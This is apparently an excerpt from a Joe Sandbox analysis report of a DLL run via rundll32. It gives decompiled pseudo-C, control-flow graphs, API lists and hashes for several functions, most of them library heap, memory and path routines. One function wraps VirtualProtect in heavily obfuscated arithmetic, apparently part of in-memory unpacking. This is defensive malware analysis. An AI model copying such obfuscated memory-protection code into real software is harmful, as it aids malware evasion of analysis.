                                                                                                            • Opcode Fuzzy Hash: a4ec4e95e76719edca13298b27ffeb92ed14bb756df65cea7ebe692d9a49c22e
                                                                                                            • Instruction Fuzzy Hash: C0F09635D0A215AAEB10DB60CC46B4E3B64EF00760F208014F5906D0D1DF74E5C0CAD5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001070F Relevance: 3.0, APIs: 2, Instructions: 34memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 282 1001070f-10010725 call 10012514 285 10010755-10010757 282->285 286 10010727-1001072d 282->286 288 10010759 285->288 289 1001075a-10010761 285->289 286->285 287 1001072f-10010753 call 10013a38 call 1001437a call 10010781 286->287 287->285 293 10010778-1001077d call 1001254f 287->293 288->289 291 10010763-10010766 289->291 292 10010769-10010772 RtlAllocateHeap 289->292 291->292 292->293
                                                                                                            C-Code - Quality: 63%
                                                                                                            			E1001070F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t19;
				void* _t21;
				void* _t24;

				_push(0xc);
				_push(0x10041d00);
				E10012514(__ebx, __edi, __esi);
				_t19 =  *(_t21 + 8);
				if( *0x10050a64 != 3) {
					L3:
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					if( *0x10050a64 != 1) {
						_t19 = _t19 + 0x0000000f & 0xfffffff0;
					}
					_t9 = RtlAllocateHeap( *0x10050a60, 0, _t19); // executed
				} else {
					_t24 = _t19 -  *0x10050a50; // 0x0
					if(_t24 > 0) {
						goto L3;
					} else {
						E10013A38(__ebx, __edi, 4);
						 *(_t21 - 4) =  *(_t21 - 4) & 0x00000000;
						_push(_t19);
						 *(_t21 - 0x1c) = E1001437A();
						 *(_t21 - 4) =  *(_t21 - 4) | 0xffffffff;
						E10010781();
						_t9 =  *(_t21 - 0x1c);
						if( *(_t21 - 0x1c) == 0) {
							goto L3;
						}
					}
				}
				return E1001254F(_t9);
			}






                                                                                                            0x1001070f
                                                                                                            0x10010711
                                                                                                            0x10010716
                                                                                                            0x1001071b
                                                                                                            0x10010725
                                                                                                            0x10010755
                                                                                                            0x10010757
                                                                                                            0x10010759
                                                                                                            0x10010759
                                                                                                            0x10010761
                                                                                                            0x10010766
                                                                                                            0x10010766
                                                                                                            0x10010772
                                                                                                            0x10010727
                                                                                                            0x10010727
                                                                                                            0x1001072d
                                                                                                            0x00000000
                                                                                                            0x1001072f
                                                                                                            0x10010731
                                                                                                            0x10010737
                                                                                                            0x1001073b
                                                                                                            0x10010742
                                                                                                            0x10010745
                                                                                                            0x10010749
                                                                                                            0x1001074e
                                                                                                            0x10010753
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10010753
                                                                                                            0x1001072d
                                                                                                            0x1001077d

                                                                                                            APIs
                                                                                                            • __lock.LIBCMT ref: 10010731
                                                                                                              • Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,10041D00,0000000C,1001079A,000000E0,100107C5,?,100139BB,00000018,10041E50,00000008,10013A51,?,?), ref: 10010772
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateCriticalEnterHeapSection__lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 409319249-0
                                                                                                            • Opcode ID: 50d20e50f01447f42db1d42bb29e4d21c1024c3df395ccd2c9c31703fcb81017
                                                                                                            • Instruction ID: 42b023ab18c65cc465c375f16582ad1359b716bf9f3aedd515ba29da9f54a78b
                                                                                                            • Opcode Fuzzy Hash: 50d20e50f01447f42db1d42bb29e4d21c1024c3df395ccd2c9c31703fcb81017
                                                                                                            • Instruction Fuzzy Hash: 1DF06D75E45665ABEB10EB708C4AB8D7BB4FB003A1F150114F9A1AE1E1D7B0BAC08E95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10013A83 Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 301 10013a83-10013aa1 HeapCreate 302 10013aa3-10013ab0 call 10013a69 301->302 303 10013acd-10013acf 301->303 306 10013ad0-10013ad3 302->306 307 10013ab2-10013abf call 10013b53 302->307 307->306 310 10013ac1-10013ac7 HeapDestroy 307->310 310->303
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10013A83(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x10050a60 = _t6;
				if(_t6 == 0) {
					L4:
					return 0;
				} else {
					_t8 = E10013A69();
					 *0x10050a64 = _t8;
					if(_t8 != 3 || E10013B53(0x3f8) != 0) {
						return 1;
					} else {
						HeapDestroy( *0x10050a60);
						goto L4;
					}
				}
			}





                                                                                                            0x10013a94
                                                                                                            0x10013a9c
                                                                                                            0x10013aa1
                                                                                                            0x10013acd
                                                                                                            0x10013acf
                                                                                                            0x10013aa3
                                                                                                            0x10013aa3
                                                                                                            0x10013aab
                                                                                                            0x10013ab0
                                                                                                            0x10013ad3
                                                                                                            0x10013ac1
                                                                                                            0x10013ac7
                                                                                                            0x00000000
                                                                                                            0x10013ac7
                                                                                                            0x10013ab0

                                                                                                            APIs
                                                                                                            • HeapCreate.KERNEL32(00000000,00001000,00000000,10011217,00000001,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013A94
                                                                                                              • Part of subcall function 10013B53: HeapAlloc.KERNEL32(00000000,00000140,10013ABC,000003F8,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B60
                                                                                                            • HeapDestroy.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013AC7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocCreateDestroy
                                                                                                            • String ID:
                                                                                                            • API String ID: 2236781399-0
                                                                                                            • Opcode ID: f6a2f7532e9ba5cb0f586e1f719da1c5d5a79765111272051b74937e09fd73f5
                                                                                                            • Instruction ID: e8a57e519fdf56151fc66cac883b31846c607769bf618c359d49edee3f1857a7
                                                                                                            • Opcode Fuzzy Hash: f6a2f7532e9ba5cb0f586e1f719da1c5d5a79765111272051b74937e09fd73f5
                                                                                                            • Instruction Fuzzy Hash: 6BE01A74A953559EEB01EB718C45B1A37E4EB44682F488829F442CD4A1EB70D680A602
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10003310 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 311 10003310-10003320 312 10003322-1000332a 311->312 313 1000332b-10003374 311->313 314 100033fa-100034e1 313->314 315 1000337a-10003387 313->315 316 10003500-1000356c VirtualProtect 314->316 317 100034e3-100034fc 314->317 318 10003389-1000338e 315->318 319 100033ed-100033f9 315->319 317->316 320 10003390-1000339c 318->320 321 100033cd-100033ea 318->321 320->321 322 1000339e-100033cb 320->322 321->319 322->319 322->321
                                                                                                            C-Code - Quality: 89%
                                                                                                            			E10003310() {
				long _t80;
				signed int _t83;
				signed int _t87;
				intOrPtr _t91;
				signed int _t101;
				signed int _t116;
				signed int _t122;
				intOrPtr _t126;
				signed int _t127;
				signed int _t132;
				signed int _t135;
				intOrPtr* _t137;
				intOrPtr* _t141;
				signed int _t150;
				signed int _t158;
				signed int _t165;
				signed int _t175;
				signed int _t186;
				signed int _t216;
				signed int _t223;
				signed int _t227;
				intOrPtr _t235;
				signed int _t238;
				void* _t239;

				_t80 =  *(_t239 + 0x18);
				_t126 =  *((intOrPtr*)(_t80 + 8));
				 *((intOrPtr*)(_t239 + 8)) = _t126;
				if(_t126 != 0) {
					_t132 =  *(_t80 + 0xc);
					_t127 =  *0x1004b0dc; // 0x0
					_t5 = _t127 + 1; // 0x1
					_t101 =  *0x1004b0ec; // 0x0
					_t165 =  *0x1004b0e0; // 0x0
					_t7 = _t165 + 0x1000000; // 0x1000000
					_t83 =  *0x1004b0e4; // 0x0
					_t150 =  *0x1004b0d8; // 0x0
					 *(_t239 + 0x10) = _t132;
					if((_t132 & _t83 * 0x7fffffff + _t165 + _t7 - _t5 * _t127 + _t101 + _t150 << 0x00000001) == 0) {
						_t35 = _t83 * _t165 + 1; // 0x1
						 *(_t239 + 0x1c) = _t83 * _t165;
						_t135 =  *0x1004b0e8; // 0x0
						asm("sbb ebp, ebp");
						asm("sbb edi, edi");
						_t216 =  *0x1004b0d8; // 0x0
						_t223 =  *0x1004b0d8; // 0x0
						asm("sbb esi, esi");
						_t158 =  *0x1004b0ec; // 0x0
						 *(_t239 + 0x14) =  *(0x1004b0f4 + ( ~( ~(_t135 * 0x7fffffff + (0x00000001 - _t135) * _t83 * _t165 +  *0x1004b0d8 + ((0x00000001 - _t216) * _t127 - _t83) * _t127 + _t135 * 0x7fffffff + (0x00000001 - _t135) * _t83 * _t165 +  *0x1004b0d8 + ((0x00000001 - _t216) * _t127 - _t83) * _t127 - 0x80000000 &  *(_t239 + 0x10))) + ( ~( ~(0x40000000 + ((_t35 * 0x3fffffff + _t135) * _t127 + (_t135 * _t165 + 0x00000001) * _t150) * 0x00000004 &  *(_t239 + 0x10))) +  ~( ~(_t150 + _t135 * 0x00000002 + _t135 + _t150 + _t135 * 0x00000002 + _t135 + 0x20000000 &  *(_t239 + 0x10))) * 2) * 2) * 4);
						_t175 =  *0x1004b0e0; // 0x0
						_t116 = _t158 * _t127;
						if(( *(_t239 + 0x10) & (_t116 * _t127 + _t116 * _t127 * 0x00000002 - 0x00000006) * _t127 + _t175 + _t175 - _t135 - _t158 + _t83 + _t223 + (_t175 + _t175 - _t135 - _t158 + _t83 + _t223) * 0x00000002 + 0x04000000) != 0) {
							 *(_t239 + 0x14) =  *(_t239 + 0x14) | _t158 * _t83 *  *0x1004b0e0 + 0x00000200 + _t158 * _t83 *  *0x1004b0e0 * 0x00000002;
						}
						_t186 =  *0x1004b0e0; // 0x0
						_t227 = _t158 * 0x3fffffff;
						_t122 =  *0x1004b0d8; // 0x0
						_t74 = _t227 + 1; // 0x1
						_t87 = VirtualProtect( *( *(_t239 + 0x30)),  *((intOrPtr*)(_t239 + 0x20)) + (_t83 * 0x3fffffff + (_t122 + _t74) * _t186 + _t122 + (2 -  *((intOrPtr*)(_t239 + 0x24)) - _t135 - _t158) * _t127) * 4,  *(_t239 + 0x18), _t239 + 0x28 + ((_t116 + _t135) * _t158 + _t186) * 8); // executed
						asm("sbb eax, eax");
						return  ~( ~_t87);
					} else {
						_t137 =  *((intOrPtr*)(_t239 + 0x28));
						_t235 =  *_t137;
						 *((intOrPtr*)(_t239 + 0x28)) = _t235;
						if(_t235 ==  *((intOrPtr*)(_t137 + 4))) {
							if( *((intOrPtr*)(_t137 + 0x10)) != 0) {
								L7:
								_t91 =  *((intOrPtr*)(_t239 + 0x24));
								 *((intOrPtr*)(_t91 + 0x20))( *(_t239 + 0x30),  *(_t239 + 0x1c), 0x4000 - _t101,  *((intOrPtr*)(_t91 + 0x34)));
							} else {
								_t141 =  *((intOrPtr*)(_t239 + 0x24));
								_t238 =  *(_t141 + 0x3c);
								if( *((intOrPtr*)( *_t141 + 0x38)) == _t238 || (_t150 + 2) * _t101 + _t83 + _t165 * 2 + ((_t150 + 2) * _t101 + _t83 + _t165 * 2) * 2 - (_t83 * _t127 * _t127 + 3 + _t83 * _t127 * _t127 * 2) *  *0x1004b0e8 +  *(_t239 + 0x18) % _t238 == 0) {
									goto L7;
								}
							}
						}
						return 1;
					}
				} else {
					return 1;
				}
			}



























                                                                                                            0x10003313
                                                                                                            0x10003317
                                                                                                            0x1000331c
                                                                                                            0x10003320
                                                                                                            0x1000332b
                                                                                                            0x1000332e
                                                                                                            0x10003334
                                                                                                            0x1000333b
                                                                                                            0x10003343
                                                                                                            0x1000334a
                                                                                                            0x10003353
                                                                                                            0x10003364
                                                                                                            0x10003370
                                                                                                            0x10003374
                                                                                                            0x100033ff
                                                                                                            0x10003408
                                                                                                            0x1000340c
                                                                                                            0x10003433
                                                                                                            0x10003447
                                                                                                            0x1000344f
                                                                                                            0x10003492
                                                                                                            0x10003498
                                                                                                            0x100034a6
                                                                                                            0x100034ac
                                                                                                            0x100034b0
                                                                                                            0x100034be
                                                                                                            0x100034e1
                                                                                                            0x100034fc
                                                                                                            0x100034fc
                                                                                                            0x10003500
                                                                                                            0x10003515
                                                                                                            0x10003525
                                                                                                            0x1000352b
                                                                                                            0x10003559
                                                                                                            0x10003563
                                                                                                            0x1000356c
                                                                                                            0x1000337a
                                                                                                            0x1000337a
                                                                                                            0x1000337e
                                                                                                            0x10003383
                                                                                                            0x10003387
                                                                                                            0x1000338e
                                                                                                            0x100033cd
                                                                                                            0x100033cd
                                                                                                            0x100033e7
                                                                                                            0x10003390
                                                                                                            0x10003390
                                                                                                            0x10003394
                                                                                                            0x1000339c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000339c
                                                                                                            0x1000338e
                                                                                                            0x100033f9
                                                                                                            0x100033f9
                                                                                                            0x10003322
                                                                                                            0x1000332a
                                                                                                            0x1000332a

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f94f5a31096f78052b225d6198edabbe45c52cabc43602b45e44eff5801c83ed
                                                                                                            • Instruction ID: 1dc449bc3d80b5784a3a7ae21000a0fc3896a9c870339c3573936ee24331a343
                                                                                                            • Opcode Fuzzy Hash: f94f5a31096f78052b225d6198edabbe45c52cabc43602b45e44eff5801c83ed
                                                                                                            • Instruction Fuzzy Hash: 1A7129335043298FD314DF58C9C1646B7E9FB89310F058A2EDD699B3A5E670FE098AC4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10037855 Relevance: 1.5, APIs: 1, Instructions: 39COMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 324 10037855-10037867 call 10011bf0 327 10037897-100378a8 call 10037552 324->327 328 10037869-10037871 324->328 337 100378aa-100378b8 call 10037732 327->337 338 100378bd-100378cc 327->338 330 10037873-1003788a call 1003768d 328->330 331 10037890 call 10037446 328->331 330->331 336 10037895 331->336 336->327 337->338
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E10037855(intOrPtr* __ecx) {
				intOrPtr _t12;
				intOrPtr _t14;
				signed char* _t15;
				long* _t17;
				long* _t19;
				intOrPtr _t23;
				intOrPtr* _t26;
				void* _t28;

				E10011BF0(0x1003aa13, _t28);
				_push(__ecx);
				_t26 = __ecx;
				if( *__ecx == 0) {
					_t20 =  *0x1004eff0; // 0x1004eff4
					if(_t20 == 0) {
						 *((intOrPtr*)(_t28 - 0x10)) = 0x1004eff4;
						 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
						_t15 = E1003768D(0x1004eff4);
						 *(_t28 - 4) =  *(_t28 - 4) | 0xffffffff;
						_t20 = _t15;
						 *0x1004eff0 = _t15; // executed
					}
					_t14 = E10037446(_t20); // executed
					 *_t26 = _t14;
				}
				_t17 =  *0x1004eff0; // 0x1004eff4
				_t23 = E10037552(_t17,  *_t26);
				if(_t23 == 0) {
					_t12 =  *((intOrPtr*)(_t28 + 8))();
					_t19 =  *0x1004eff0; // 0x1004eff4
					_t23 = _t12;
					E10037732(_t19,  *_t26, _t23);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
				return _t23;
			}











                                                                                                            0x1003785a
                                                                                                            0x1003785f
                                                                                                            0x10037861
                                                                                                            0x10037867
                                                                                                            0x10037869
                                                                                                            0x10037871
                                                                                                            0x10037878
                                                                                                            0x1003787b
                                                                                                            0x1003787f
                                                                                                            0x10037884
                                                                                                            0x10037888
                                                                                                            0x1003788a
                                                                                                            0x1003788a
                                                                                                            0x10037890
                                                                                                            0x10037895
                                                                                                            0x10037895
                                                                                                            0x10037899
                                                                                                            0x100378a4
                                                                                                            0x100378a8
                                                                                                            0x100378aa
                                                                                                            0x100378ad
                                                                                                            0x100378b3
                                                                                                            0x100378b8
                                                                                                            0x100378b8
                                                                                                            0x100378c4
                                                                                                            0x100378cc

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1003785A
                                                                                                              • Part of subcall function 1003768D: TlsAlloc.KERNEL32(?,10037884,?,?,?,100373C4,100347FD,100071DC), ref: 100376AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocH_prolog
                                                                                                            • String ID:
                                                                                                            • API String ID: 3910492588-0
                                                                                                            • Opcode ID: afc1abf3d35d6b52cdf0f25188e220ecb9e5087980f930720a4386ab5437719b
                                                                                                            • Instruction ID: 4636a69bf69d573d2e706337ed3b04a464365e57385db0f45bc25e4442f629a4
                                                                                                            • Opcode Fuzzy Hash: afc1abf3d35d6b52cdf0f25188e220ecb9e5087980f930720a4386ab5437719b
                                                                                                            • Instruction Fuzzy Hash: 80018B396001A29FE72ACF18C851B6D77A2FB81362F10053EE996DB290DB349C00CB64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100045D0 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 341 100045d0-100045ea VirtualAlloc
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100045D0(void* _a4, long _a8, long _a12, long _a16) {
				void* _t7;

				_t7 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
				return _t7;
			}




                                                                                                            0x100045e4
                                                                                                            0x100045ea

                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNEL32(?,?,?,?), ref: 100045E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 79d8040eb94a772a3858464c411fe2626b1031866cac9e3cc93b0a28150a8e2a
                                                                                                            • Instruction ID: c6cc4055dfec23ff58d81a81712461c79eda0eebf3d1de213efbbce8f3264bb9
                                                                                                            • Opcode Fuzzy Hash: 79d8040eb94a772a3858464c411fe2626b1031866cac9e3cc93b0a28150a8e2a
                                                                                                            • Instruction Fuzzy Hash: FCC0EAB9608201AF9A04DB54C988C6BB7E9EBC8641F008909B59983210D630E8408B22
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100045F0 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 342 100045f0-10004605 VirtualFree
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100045F0(void* _a4, long _a8, long _a12) {
				int _t5;

				_t5 = VirtualFree(_a4, _a8, _a12); // executed
				return _t5;
			}




                                                                                                            0x100045ff
                                                                                                            0x10004605

                                                                                                            APIs
                                                                                                            • VirtualFree.KERNELBASE(?,?,?), ref: 100045FF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1263568516-0
                                                                                                            • Opcode ID: 174df1bf701f566af763c199529526010cd62a485baa78f61ffb0b3445841b2f
                                                                                                            • Instruction ID: 188741ce2ee140a107eafa4ec0cdb16d021ba485332012740db5241ef1f15393
                                                                                                            • Opcode Fuzzy Hash: 174df1bf701f566af763c199529526010cd62a485baa78f61ffb0b3445841b2f
                                                                                                            • Instruction Fuzzy Hash: D3C048B9218201BFEA04DB50CA88C2BB7A9EBC8A11F00C90DB88983210C630EC00DA22
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            Function 1002592C Relevance: 15.1, APIs: 10, Instructions: 102stringfileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002592C(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t33;
				long _t35;
				intOrPtr* _t36;
				void* _t43;
				void* _t49;
				CHAR* _t69;
				void* _t74;
				void* _t76;

				E10011BF0(0x1003acd2, _t76);
				_t33 =  *0x1004c470; // 0x6edecb8c
				_t69 =  *(_t76 + 8);
				 *((intOrPtr*)(_t76 - 0x10)) = _t33;
				_t35 = GetFullPathNameA( *(_t76 + 0xc), 0x104, _t69, _t76 - 0x154);
				if(_t35 != 0) {
					if(_t35 < 0x104) {
						_t36 = E100243B2();
						_t67 =  *_t36;
						 *(_t76 + 8) =  *((intOrPtr*)( *_t36 + 0xc))() + 0x10;
						 *((intOrPtr*)(_t76 - 4)) = 0;
						E100258EA(0, _t69, _t76 + 8);
						if(PathIsUNCA( *(_t76 + 8)) != 0) {
							L15:
							_t74 = 1;
						} else {
							if(GetVolumeInformationA( *(_t76 + 8), 0, 0, 0, _t76 - 0x15c, _t76 - 0x158, 0, 0) != 0) {
								if(( *(_t76 - 0x158) & 0x00000002) == 0) {
									CharUpperA(_t69);
								}
								if(( *(_t76 - 0x158) & 0x00000004) != 0) {
									goto L15;
								} else {
									_t49 = FindFirstFileA( *(_t76 + 0xc), _t76 - 0x150);
									if(_t49 == 0xffffffff) {
										goto L15;
									} else {
										FindClose(_t49);
										if( *(_t76 - 0x154) == 0 ||  *(_t76 - 0x154) <= _t69 || lstrlenA(_t76 - 0x124) - _t69 +  *(_t76 - 0x154) >= 0x104) {
											goto L6;
										} else {
											lstrcpyA( *(_t76 - 0x154), _t76 - 0x124);
											goto L15;
										}
									}
								}
							} else {
								L6:
								_t74 = 0;
							}
						}
						E100014B0( &(( *(_t76 + 8))[0xfffffffffffffff0]), _t67);
						_t43 = _t74;
					} else {
						goto L3;
					}
				} else {
					lstrcpynA(_t69,  *(_t76 + 0xc), 0x104);
					L3:
					_t43 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return E100117AE(_t43,  *((intOrPtr*)(_t76 - 0x10)));
			}











                                                                                                            0x10025931
                                                                                                            0x1002593c
                                                                                                            0x10025944
                                                                                                            0x10025947
                                                                                                            0x1002595b
                                                                                                            0x10025965
                                                                                                            0x10025976
                                                                                                            0x1002597f
                                                                                                            0x10025984
                                                                                                            0x1002598e
                                                                                                            0x10025996
                                                                                                            0x10025999
                                                                                                            0x100259a9
                                                                                                            0x10025a44
                                                                                                            0x10025a46
                                                                                                            0x100259af
                                                                                                            0x100259cd
                                                                                                            0x100259da
                                                                                                            0x100259dd
                                                                                                            0x100259dd
                                                                                                            0x100259ea
                                                                                                            0x00000000
                                                                                                            0x100259ec
                                                                                                            0x100259f6
                                                                                                            0x100259ff
                                                                                                            0x00000000
                                                                                                            0x10025a01
                                                                                                            0x10025a02
                                                                                                            0x10025a0e
                                                                                                            0x00000000
                                                                                                            0x10025a31
                                                                                                            0x10025a3e
                                                                                                            0x00000000
                                                                                                            0x10025a3e
                                                                                                            0x10025a0e
                                                                                                            0x100259ff
                                                                                                            0x100259cf
                                                                                                            0x100259cf
                                                                                                            0x100259cf
                                                                                                            0x100259cf
                                                                                                            0x100259cd
                                                                                                            0x10025a4d
                                                                                                            0x10025a52
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10025967
                                                                                                            0x1002596c
                                                                                                            0x10025978
                                                                                                            0x10025978
                                                                                                            0x10025978
                                                                                                            0x10025a59
                                                                                                            0x10025a6a

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10025931
                                                                                                            • GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 1002595B
                                                                                                            • lstrcpynA.KERNEL32(?,?,00000104), ref: 1002596C
                                                                                                              • Part of subcall function 100258EA: lstrcpynA.KERNEL32(00000000,?,00000104), ref: 1002590F
                                                                                                              • Part of subcall function 100258EA: PathStripToRootA.SHLWAPI(00000000), ref: 10025916
                                                                                                            • PathIsUNCA.SHLWAPI(?,?,?), ref: 100259A1
                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 100259C5
                                                                                                            • CharUpperA.USER32(?), ref: 100259DD
